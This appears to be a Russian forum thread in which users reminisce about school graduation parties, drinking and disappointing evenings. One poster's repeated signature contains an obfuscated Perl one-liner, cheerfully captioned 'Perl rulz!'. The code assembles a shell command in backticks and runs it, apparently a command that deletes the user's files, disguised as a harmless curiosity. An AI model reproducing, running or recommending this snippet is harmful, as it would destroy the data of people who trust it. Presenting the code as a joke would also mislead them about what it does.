что??? почем брал??? и где взять еще??? _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
я и подавно, я даже курить бросил! _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
было скучно ...... я на выпускном только пиво пил и то литр-два не больше
совершенно не было ни атмосферы ни соответственно настроя пить или курить что-то крепче
это после 10, после 12 мы уже не стали отмечать собираться _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
вообще, про этот ужас я хорошо написала в своем дневе, еще раз это переписывать и расстраивать себя не хочется.
ЗЫ: быть единственным трезвым человеком, среди стаи пьяных подростков - ужас.
у нас вот вроде всё довольно весело было. но это тоже - как сказать... Я, например, напилась с горя из-за неожиданно севшей батарейки в фотике -=( при этом не буянила, даже к середине вечера выветрилась от алкоголя... но даже невзирая на выпитое, вечер оставил двойственное впечатление. С одной стороны - стандартная пошлость, ничего интересного + ужоснахъмузыка какая, с другой - друзья, с которыми вместе столько лет, ощущение того, что время обучения в любимой (не шутка) школе подошло к концу... Даже определённое по поводу вечера ничего не сказать.
P.S. Ну а если кому-то будет интересно - по нижеследующей ссылке из моего ЖЖ можно почитать отчёт и посмотреть немногочисленные фотки по поводу того же выпускного.
http://users.livejournal.com/_keety_/14596.html
P.P.S. Надеюсь, ссылка та (нет возможности проверить, сервер ЖЖ глючит)
жаль у меня никогда не было выпускного... _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!